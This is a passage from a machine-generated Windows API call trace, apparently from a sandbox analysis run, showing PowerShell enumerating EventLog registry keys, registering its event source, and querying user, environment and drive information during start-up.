	[0603.986] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x374) returned 0x0
	[0603.986] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.987] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x378) returned 0x0
	[0603.987] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.987] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x37c) returned 0x0
	[0603.987] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.987] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x380) returned 0x0
	[0603.987] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x384) returned 0x0
	[0603.987] RegCloseKey (hKey=0x384) returned 0x0
	[0603.988] RegCloseKey (hKey=0x360) returned 0x0
	[0603.988] RegCloseKey (hKey=0x380) returned 0x0
	[0603.990] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad178 | out: phkResult=0xad178*=0x380) returned 0x0
	[0603.990] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.990] CoTaskMemFree (pv=0x0) 
	[0603.990] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.990] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.990] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.990] CoTaskMemFree (pv=0x0) 
	[0603.990] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.990] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.990] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.990] CoTaskMemFree (pv=0x0) 
	[0603.990] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.990] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.991] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.991] CoTaskMemFree (pv=0x0) 
	[0603.991] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.991] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.991] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.991] CoTaskMemFree (pv=0x0) 
	[0603.991] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.991] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.991] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.991] CoTaskMemFree (pv=0x0) 
	[0603.991] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.991] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.991] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.991] CoTaskMemFree (pv=0x0) 
	[0603.991] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.991] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.991] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.992] CoTaskMemFree (pv=0x0) 
	[0603.992] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.992] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.992] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.992] CoTaskMemFree (pv=0x0) 
	[0603.992] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.992] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x1a4bb0, lpcchName=0xad178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.992] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.992] CoTaskMemFree (pv=0x0) 
	[0603.992] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x360) returned 0x0
	[0603.992] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.992] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x384) returned 0x0
	[0603.992] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x388) returned 0x0
	[0603.993] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x38c) returned 0x0
	[0603.993] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x390) returned 0x0
	[0603.993] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x394) returned 0x0
	[0603.993] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x398) returned 0x0
	[0603.994] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.994] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x39c) returned 0x0
	[0603.994] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x0) returned 0x2
	[0603.994] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x3a0) returned 0x0
	[0603.994] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1d8 | out: phkResult=0xad1d8*=0x3a4) returned 0x0
	[0603.995] RegCloseKey (hKey=0x3a4) returned 0x0
	[0603.995] RegCloseKey (hKey=0x380) returned 0x0
	[0603.995] RegCloseKey (hKey=0x3a0) returned 0x0
	[0604.000] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b850008
	[0604.272] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33aa2e8*="WSMan", lpRawData=0x33aa058) returned 1
	[0604.276] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.276] CoTaskMemFree (pv=0x20da70) 
	[0604.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.278] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0604.278] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0604.278] CoTaskMemFree (pv=0x1b786f60) 
	[0604.278] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0604.278] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0604.279] CoTaskMemFree (pv=0x1a4bb0) 
	[0604.279] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33af820*="Alias", lpRawData=0x33af5b0) returned 1
	[0604.286] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.286] CoTaskMemFree (pv=0x20da70) 
	[0604.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.288] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0604.288] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0604.289] CoTaskMemFree (pv=0x1b786f60) 
	[0604.289] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0604.289] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0604.289] CoTaskMemFree (pv=0x1a4bb0) 
	[0604.290] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33b4e18*="Environment", lpRawData=0x33b4ba8) returned 1
	[0604.296] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.296] CoTaskMemFree (pv=0x20da70) 
	[0604.297] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.297] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0604.297] CoTaskMemFree (pv=0x20da70) 
	[0604.297] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.297] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0604.297] CoTaskMemFree (pv=0x20da70) 
	[0604.298] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0604.298] SetErrorMode (uMode=0x1) returned 0x1
	[0604.298] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xad220 | out: lpFileInformation=0xad220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.298] SetErrorMode (uMode=0x1) returned 0x1
	[0604.299] GetLogicalDrives () returned 0x4
	[0604.300] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.301] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.301] SetErrorMode (uMode=0x1) returned 0x1
	[0604.301] CoTaskMemAlloc (cb=0x68) returned 0x216ce0
	[0604.301] CoTaskMemAlloc (cb=0x68) returned 0x216c70
	[0604.301] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x216ce0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xad1f0, lpMaximumComponentLength=0xad1ec, lpFileSystemFlags=0xad1e8, lpFileSystemNameBuffer=0x216c70, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xad1f0*=0x9c354b42, lpMaximumComponentLength=0xad1ec*=0xff, lpFileSystemFlags=0xad1e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0604.302] CoTaskMemFree (pv=0x216ce0) 
	[0604.302] CoTaskMemFree (pv=0x216c70) 
	[0604.302] SetErrorMode (uMode=0x1) returned 0x1
	[0604.302] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.302] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xacf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.302] SetErrorMode (uMode=0x1) returned 0x1
	[0604.302] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad190 | out: lpFileInformation=0xad190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.302] SetErrorMode (uMode=0x1) returned 0x1
	[0604.303] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xacf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.303] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.303] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.303] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.303] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.303] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.304] SetErrorMode (uMode=0x1) returned 0x1
	[0604.304] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xacfc0 | out: lpFileInformation=0xacfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.304] SetErrorMode (uMode=0x1) returned 0x1
	[0604.304] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.304] SetErrorMode (uMode=0x1) returned 0x1
	[0604.304] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xacfc0 | out: lpFileInformation=0xacfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.304] SetErrorMode (uMode=0x1) returned 0x1
	[0604.304] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xace00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.304] SetErrorMode (uMode=0x1) returned 0x1
	[0604.304] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad060 | out: lpFileInformation=0xad060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.305] SetErrorMode (uMode=0x1) returned 0x1
	[0604.305] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0604.305] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0604.305] CoTaskMemFree (pv=0x1b786f60) 
	[0604.305] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0604.305] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0604.305] CoTaskMemFree (pv=0x1a4bb0) 
	[0604.306] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33bbf08*="FileSystem", lpRawData=0x33bbc98) returned 1
	[0604.321] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.321] CoTaskMemFree (pv=0x20da70) 
	[0604.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.322] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0604.322] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0604.322] CoTaskMemFree (pv=0x1b786f60) 
	[0604.323] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0604.323] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0604.323] CoTaskMemFree (pv=0x1a4bb0) 
	[0604.323] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33c1748*="Function", lpRawData=0x33c14d8) returned 1
	[0604.331] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0604.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.331] CoTaskMemFree (pv=0x20da70) 
	[0604.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
